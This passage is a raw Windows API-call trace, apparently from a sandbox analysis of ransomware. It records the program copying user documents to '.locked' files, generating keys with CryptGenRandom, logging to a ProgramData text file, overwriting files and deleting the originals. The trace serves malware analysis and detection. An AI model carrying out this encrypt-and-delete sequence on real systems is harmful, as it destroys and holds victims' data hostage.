(hEvent=0x12c) returned 1 [0293.159] SetEvent (hEvent=0x104) returned 1 [0293.159] SetEvent (hEvent=0x134) returned 1 [0293.159] SetEvent (hEvent=0x1dc) returned 1 [0293.159] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0293.250] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\5yfr.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\5yfr.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0293.251] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1249ed9c | out: lpMode=0x1249ed9c) returned 0 [0293.251] WriteFile (in: hFile=0x1b0, lpBuffer=0x13a0e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ae78, lpOverlapped=0x0 | out: lpBuffer=0x13a0e000*, lpNumberOfBytesWritten=0x1276ae78*=0xfa000, lpOverlapped=0x0) returned 1 [0293.443] CloseHandle (hObject=0x1b0) returned 1 [0293.483] SetEvent (hEvent=0x1b8) returned 1 [0293.483] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.321] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0295.333] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.333] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0295.334] SetEvent (hEvent=0x134) returned 1 [0295.334] SetEvent (hEvent=0x1ac) returned 1 [0295.341] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0295.351] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.351] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0295.384] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.384] SetEvent (hEvent=0x104) returned 1 [0295.384] SetEvent (hEvent=0x20c) returned 1 [0295.384] SetEvent (hEvent=0x1ac) returned 1 [0295.384] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.439] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0295.439] SetEvent (hEvent=0x150) returned 1 [0295.439] SetEvent (hEvent=0x1ac) returned 1 [0295.459] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0295.497] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.497] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0295.497] SetEvent (hEvent=0x1ac) returned 1 [0295.509] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0295.525] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.526] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a1a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x123a1a24*=0xb) returned 1 [0295.553] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0295.560] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.560] SetEvent (hEvent=0x1ac) returned 1 [0295.560] SetEvent (hEvent=0x12c) returned 1 [0295.560] SetEvent (hEvent=0x20c) returned 1 [0295.560] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.624] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0295.624] SetEvent (hEvent=0x20c) returned 1 [0295.624] SetEvent (hEvent=0x12c) returned 1 [0295.624] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0295.676] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.676] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0295.676] SetEvent (hEvent=0x150) returned 1 [0295.676] SetEvent (hEvent=0x12c) returned 1 [0295.676] SetEvent (hEvent=0x20c) returned 1 [0295.678] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0295.712] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.712] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0295.752] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.752] SetEvent (hEvent=0x190) returned 1 [0295.752] SetEvent (hEvent=0x12c) returned 1 [0295.752] SetEvent (hEvent=0x20c) returned 1 [0295.753] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0295.790] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0295.790] SetEvent (hEvent=0x150) returned 1 [0295.790] SetEvent (hEvent=0x20c) returned 1 [0295.790] SetEvent (hEvent=0x12c) returned 1 [0295.791] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\9Q7-bFR.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\9q7-bfr.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0295.944] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0296.587] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x12625e88 | out: lpMode=0x12625e88) returned 0 [0296.587] SetEvent (hEvent=0x1b8) returned 1 [0296.587] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0296.654] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0297.210] SetEvent (hEvent=0x1dc) returned 1 [0297.329] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0297.359] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0297.359] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0297.359] SetEvent (hEvent=0x150) returned 1 [0297.359] SetEvent (hEvent=0x1ac) returned 1 [0297.359] SetEvent (hEvent=0x1dc) returned 1 [0297.359] SetEvent (hEvent=0x12c) returned 1 [0297.367] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0297.377] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0297.377] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0297.439] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0297.439] SetEvent (hEvent=0x12c) returned 1 [0297.439] SetEvent (hEvent=0x1dc) returned 1 [0297.439] SetEvent (hEvent=0x1ac) returned 1 [0297.439] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0297.490] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0297.490] SetEvent (hEvent=0x150) returned 1 [0297.490] SetEvent (hEvent=0x1ac) returned 1 [0297.490] SetEvent (hEvent=0x1dc) returned 1 [0297.504] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\PksQcVAF-FVG.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pksqcvaf-fvg.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0297.693] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0298.558] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x123a3e88 | out: lpMode=0x123a3e88) returned 0 [0298.558] WriteFile (in: hFile=0x228, lpBuffer=0x137ae000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x123a3e78, lpOverlapped=0x0 | out: lpBuffer=0x137ae000*, lpNumberOfBytesWritten=0x123a3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0298.605] CloseHandle (hObject=0x228) returned 1 [0299.102] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0299.719] SetEvent (hEvent=0x150) returned 1 [0299.719] SetEvent (hEvent=0x22c) returned 1 [0299.719] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\PksQcVAF-FVG.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pksqcvaf-fvg.docx")) returned 1 [0299.853] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0299.915] SetEvent (hEvent=0x198) returned 1 [0299.915] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0299.971] SetEvent (hEvent=0x20c) returned 1 [0299.971] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0300.451] SetEvent (hEvent=0x214) returned 1 [0300.451] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0300.498] SetEvent (hEvent=0x1b8) returned 1 [0300.498] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0300.506] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\4bt-B2q.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\4bt-b2q.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0300.507] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1249dd9c | out: lpMode=0x1249dd9c) returned 0 [0300.507] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\4bt-B2q.pdf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\4bt-b2q.pdf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0300.610] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1249dd9c | out: lpMode=0x1249dd9c) returned 0 [0300.610] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0300.610] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766020 | out: pbBuffer=0x12766020) returned 1 [0300.610] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0300.611] WriteFile (in: hFile=0x1c8, lpBuffer=0x126c7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a1d78, lpOverlapped=0x0 | out: lpBuffer=0x126c7000*, lpNumberOfBytesWritten=0x123a1d78*=0x80, lpOverlapped=0x0) returned 1 [0300.614] ReadFile (in: hFile=0x1b0, lpBuffer=0x14350000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x14350000*, lpNumberOfBytesRead=0x123a1d68*=0x110e2, lpOverlapped=0x0) returned 1 [0300.628] WriteFile (in: hFile=0x1c8, lpBuffer=0x14350000*, nNumberOfBytesToWrite=0x110e2, lpNumberOfBytesWritten=0x123a1d74, lpOverlapped=0x0 | out: lpBuffer=0x14350000*, lpNumberOfBytesWritten=0x123a1d74*=0x110e2, lpOverlapped=0x0) returned 1 [0300.634] ReadFile (in: hFile=0x1b0, lpBuffer=0x14350000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x14350000*, lpNumberOfBytesRead=0x123a1d68*=0x0, lpOverlapped=0x0) returned 1 [0300.634] CloseHandle (hObject=0x1c8) returned 1 [0300.639] CloseHandle (hObject=0x1b0) returned 1 [0300.639] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0300.640] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x123a1e94 | out: lpMode=0x123a1e94) returned 0 [0300.640] WriteFile (in: hFile=0x1b0, lpBuffer=0x12574140*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x123a1e64, lpOverlapped=0x0 | out: lpBuffer=0x12574140*, lpNumberOfBytesWritten=0x123a1e64*=0x4a, lpOverlapped=0x0) returned 1 [0300.640] CloseHandle (hObject=0x1b0) returned 1 [0300.642] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\4bt-B2q.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\4bt-b2q.pdf")) returned 1 [0300.658] SetEvent (hEvent=0x184) returned 1 [0300.659] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0303.755] SetEvent (hEvent=0x214) returned 1 [0303.755] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0304.526] SetEvent (hEvent=0x1ac) returned 1 [0304.526] SetEvent (hEvent=0x190) returned 1 [0304.526] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0304.529] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0304.551] SetEvent (hEvent=0x1b8) returned 1 [0304.551] SetEvent (hEvent=0x20c) returned 1 [0304.551] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0304.655] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0304.656] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0304.656] SetEvent (hEvent=0x150) returned 1 [0304.656] SetEvent (hEvent=0x1b8) returned 1 [0304.657] SetEvent (hEvent=0x184) returned 1 [0304.657] SetEvent (hEvent=0x104) returned 1 [0304.658] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0304.659] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0304.659] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0304.661] SetEvent (hEvent=0x198) returned 1 [0304.661] SetEvent (hEvent=0x104) returned 1 [0304.661] SetEvent (hEvent=0x184) returned 1 [0304.661] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0304.662] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0304.662] SetEvent (hEvent=0x150) returned 1 [0304.662] SetEvent (hEvent=0x184) returned 1 [0304.662] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\GFqXQi80UXX3UPgD.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\gfqxqi80uxx3upgd.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0304.763] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0304.772] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x124c9e88 | out: lpMode=0x124c9e88) returned 0 [0304.772] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0304.806] SetEvent (hEvent=0x1f0) returned 1 [0304.806] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0304.807] SetEvent (hEvent=0x1dc) returned 1 [0304.808] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0304.811] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a1a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x123a1a24*=0xb) returned 1 [0304.863] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\EzBvLweM.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\ezbvlwem.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0304.863] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0304.863] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\EzBvLweM.doc.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\ezbvlwem.doc.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0304.864] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0304.864] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0304.864] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e060 | out: pbBuffer=0x1234e060) returned 1 [0304.864] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702381 | out: pbBuffer=0x12702381) returned 1 [0304.865] WriteFile (in: hFile=0x224, lpBuffer=0x126e3000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a1d78, lpOverlapped=0x0 | out: lpBuffer=0x126e3000*, lpNumberOfBytesWritten=0x123a1d78*=0x80, lpOverlapped=0x0) returned 1 [0304.867] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x0 [0304.881] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb30, ulCount=0x10, ulNumEntriesRemoved=0x3278fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb30, ulNumEntriesRemoved=0x3278fb10) returned 0 [0304.881] SetEvent (hEvent=0x150) returned 1 [0304.881] SetEvent (hEvent=0x1f0) returned 1 [0304.881] SetEvent (hEvent=0x21c) returned 1 [0304.881] SetEvent (hEvent=0x1ac) returned 1 [0304.881] ReadFile (in: hFile=0x230, lpBuffer=0x15dec000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x15dec000*, lpNumberOfBytesRead=0x123a1d68*=0x10734, lpOverlapped=0x0) returned 1 [0304.884] WriteFile (in: hFile=0x224, lpBuffer=0x15dec000*, nNumberOfBytesToWrite=0x10734, lpNumberOfBytesWritten=0x123a1d74, lpOverlapped=0x0 | out: lpBuffer=0x15dec000*, lpNumberOfBytesWritten=0x123a1d74*=0x10734, lpOverlapped=0x0) returned 1 [0304.972] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0305.426] SetEvent (hEvent=0x104) returned 1 [0305.426] ReadFile (in: hFile=0x230, lpBuffer=0x15dec000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a1d68, lpOverlapped=0x0 | out: lpBuffer=0x15dec000*, lpNumberOfBytesRead=0x123a1d68*=0x0, lpOverlapped=0x0) returned 1 [0305.426] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0305.713] CloseHandle (hObject=0x224) returned 1 [0305.717] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0305.797] CloseHandle (hObject=0x230) returned 1 [0305.797] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0306.004] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0306.004] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x123a1e94 | out: lpMode=0x123a1e94) returned 0 [0306.004] WriteFile (in: hFile=0x180, lpBuffer=0x1264a100*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x123a1e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a100*, lpNumberOfBytesWritten=0x123a1e64*=0x37, lpOverlapped=0x0) returned 1 [0306.005] CloseHandle (hObject=0x180) returned 1 [0306.006] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\EzBvLweM.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\ezbvlwem.doc")) returned 1 [0306.037] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0306.116] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\EzBvLweM.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\ezbvlwem.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0306.237] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0306.405] SetEvent (hEvent=0x22c) returned 1 [0306.405] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x123a1e88 | out: lpMode=0x123a1e88) returned 0 [0306.405] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0306.709] SetEvent (hEvent=0x150) returned 1 [0306.709] SetEvent (hEvent=0x1e8) returned 1 [0306.709] WriteFile (in: hFile=0x224, lpBuffer=0x13480000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x123a1e78, lpOverlapped=0x0 | out: lpBuffer=0x13480000*, lpNumberOfBytesWritten=0x123a1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0306.736] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0306.804] CloseHandle (hObject=0x224) returned 1 [0306.930] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0306.989] SetEvent (hEvent=0x1ac) returned 1 [0306.989] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0306.991] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0307.084] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0307.091] SetEvent (hEvent=0x21c) returned 1 [0307.091] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0307.339] SetEvent (hEvent=0x1ac) returned 1 [0307.339] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\gCYkDpyT1k8vMjkIl.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gcykdpyt1k8vmjkil.docx")) returned 1 [0307.360] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0307.679] SetEvent (hEvent=0x20c) returned 1 [0307.680] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0307.688] SetEvent (hEvent=0x220) returned 1 [0307.688] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0307.701] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0307.701] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x1) returned 0x102 [0307.704] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0307.704] SetEvent (hEvent=0x1dc) returned 1 [0307.704] SetEvent (hEvent=0x1d0) returned 1 [0307.704] SetEvent (hEvent=0x220) returned 1 [0307.704] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0307.708] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3278fb34, ulCount=0x10, ulNumEntriesRemoved=0x3278fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3278fb34, ulNumEntriesRemoved=0x3278fb14) returned 0 [0307.709] SetEvent (hEvent=0x1dc) returned 1 [0307.709] SetEvent (hEvent=0x1d0) returned 1 [0307.709] SetEvent (hEvent=0x220) returned 1 [0307.709] SetEvent (hEvent=0x21c) returned 1 [0307.709] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0307.874] SetEvent (hEvent=0x220) returned 1 [0307.874] SetEvent (hEvent=0x190) returned 1 [0307.874] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0308.750] SetEvent (hEvent=0x21c) returned 1 [0308.750] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0xffffffff) returned 0x0 [0308.775] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x123a1a24, lpReserved=0x0 | out: lpBuffer=0x125fc020*, lpNumberOfCharsWritten=0x123a1a24*=0xc) returned 1 [0308.776] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\IcIyvO_b9I-.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\iciyvo_b9i-.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0308.776] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0308.776] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\IcIyvO_b9I-.wav.locked" (normalized: 